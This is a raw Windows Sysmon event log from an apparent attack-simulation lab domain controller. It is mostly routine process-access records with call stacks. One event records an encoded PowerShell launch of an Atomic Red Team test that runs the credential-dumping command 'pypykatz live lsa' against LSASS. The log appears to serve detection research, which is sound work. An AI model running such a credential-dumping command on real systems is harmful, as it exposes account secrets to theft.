15:53:03.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005627Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005626Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CDF-5FA1-2B01-000000008801}2716C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005625Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.926{D28789B6-7CDE-5FA1-2301-000000008801}35642604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7CDF-5FA1-2B01-000000008801}2716C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1815e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005624Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.932{D28789B6-7CDF-5FA1-2B01-000000008801}2716C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7CDE-5FA1-2301-000000008801}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000005623Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.894{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CDF-5FA1-2901-000000008801}1644C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005622Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.894{D28789B6-7CDF-5FA1-2901-000000008801}16442816C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005621Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.660{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CDF-5FA1-2A01-000000008801}2272C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005620Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.660{D28789B6-7CD9-5FA1-FC00-000000008801}26124136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CDF-5FA1-2A01-000000008801}2272C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAC74C3) 10341000x80000000000000005619Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005618Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005617Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005616Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005615Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005614Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005613Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005612Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005611Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005610Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CDF-5FA1-2A01-000000008801}2272C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005609Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7CD9-5FA1-FC00-000000008801}26124136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CDF-5FA1-2A01-000000008801}2272C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd378a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd35fe(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30e55e2a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dcc1e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318853d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30d949de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30df2ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd63a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dc8328(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30e014b8(wow64) 154100x80000000000000005608Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.658{D28789B6-7CDF-5FA1-2A01-000000008801}2272C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "pypykatz live lsa" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CD9-5FA1-FC00-000000008801}2612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA== 10341000x80000000000000005607Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CDF-5FA1-2901-000000008801}1644C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005606Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005605Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:03.644{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 